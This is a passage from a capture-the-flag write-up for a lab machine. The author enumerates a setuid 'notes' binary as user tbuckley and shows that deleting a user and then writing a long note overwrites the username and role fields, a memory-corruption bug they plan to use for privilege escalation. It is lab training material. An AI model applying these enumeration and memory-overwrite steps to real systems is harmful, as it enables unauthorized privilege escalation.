notes
There are a few things that I am able to access since I have made a lateral movement to the tbuckley user
One of that is membership.
The tbuckley user is part of the dev group
tbuckley@gofer:~$ find / -group dev -ls -type f 2>/dev/null
136487 20 -rwsr-s--- 1 root dev 17168 apr 28 16:06 /usr/local/bin/notesMembers of the dev group is able to execute the SGID binary; /usr/local/bin/notes
All of this was initially enumerated earlier, but I was unable to proceed further as it was hidden away due to the permission set
tbuckley@gofer:~$ file /usr/local/bin/notes
/usr/local/bin/notes: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=6a9c0faa06eabfa48a864bb7341f29deecd7e9e3, for GNU/Linux 3.2.0, not strippedIt’s a 64-bit binary
tbuckley@gofer:~$ /usr/local/bin/notes
========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================
your choice: Executing the binary gives out 9 options
[...REDACTED...]
your choice: 2
First create an user!
[...REDACTED...]
your choice: 3
[...REDACTED...]
your choice: 5
note: (null)
[...REDACTED...]
your choice: 6
Coming soon!
[...REDACTED...]
your choice: 7There appears to be no user/note While it appears that I can create that, the option 8 to back up notes seems interesting
your choice: 8
First create an user!However, it requires user creation
your choice: 1
choose an username: qwe
[...REDACTED...]
your choice: 2
username: qwe
role: userSo I created a user; qwe
your choice: 8
access denied: you don't have the admin role!It seems that only users with admin role can perform the backup operation
your choice: 4
write your note:
This is a note statementI will test out the note features
your choice: 5
note: statementInterestingly, the option 5 only prints out, statement, instead of the full, This is a note statement
Overflow
After playing around with those options for awhile, I found an interesting pattern that data is getting overwritten
Your choice: 1
Choose an username: qwe
Your choice: 2
Username: qwe
Role: userCreating a new username and checking it first
Your choice: 3
Your choice: 2
Username:
Role: userOption 3 to delete, and then option 2 to review the changes
notice that only the Username attribute is gone
tbuckley@gofer:/opt$ python3 -c 'print("A"*16+"B"*16+"C"*16+"D"*16)'
AAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDI will then generate a 64-byte-long string. The string consists of 16 bytes of A,B,C,D sequentially to distinguish the byte count
Your choice: 4
Write your note:
AAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDThen proceed to writing a note by selecting the option 4
Your choice: 5
Note: CCCCCCCCCDDDDDDDDDDDDDDDDWhile the note itself is only partially written, there is something critical happens in the username and role
Your choice: 2
Username: AAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCC
Role: BBBBBBBBCCCCCCCIt has overwritten the user attributes. Both Username and Role
I was able to reproduce the result multiple times, and that implies that I can control what goes in to those attributes
Once I get to the admin role, I should be able to get to the backup operation , 8
Moving on to Privilege Escalation phase